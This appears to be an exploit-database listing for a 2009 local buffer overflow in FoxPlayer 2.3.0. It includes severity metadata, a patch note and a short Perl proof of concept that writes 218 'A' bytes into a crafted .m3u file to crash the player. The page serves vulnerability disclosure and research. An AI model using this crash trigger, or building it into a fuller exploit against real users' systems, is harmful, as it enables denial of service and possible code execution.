header-logo
Suggest Exploit
vendor:
FoxPlayer
by:
Anastasios Monachos
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: FoxPlayer
Affected Version From: 2.3.0
Affected Version To: 2.3.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:foxmediatools:foxplayer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Pro SP2
2009

FoxPlayer Version 2.3.0 (.m3u) Local BOF PoC

FoxPlayer Version 2.3.0 is vulnerable to a buffer overflow vulnerability when a specially crafted .m3u file is opened. The application will crash with 218 bytes, more will do the job too.

Mitigation:

Update to the latest version of FoxPlayer
Source

Exploit-DB raw data:

#!/usr/bin/perl
###########################################################################
#Title: FoxPlayer Version 2.3.0 (.m3u) Local BOF PoC
#Download: http://www.foxmediatools.com/products/foxplayer.html
#Tested on WinXP Pro SP2
#Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
#Greetz: offsec and inj3ct0r teams
###########################################################################
my $junk= "\x41" x 218 ; #Application will crash with 218 bytes, more will do the job too
open(file,">crash.m3u");
print file $junk ;
close(file);

Navigation

Suggest Exploit

Services By CQR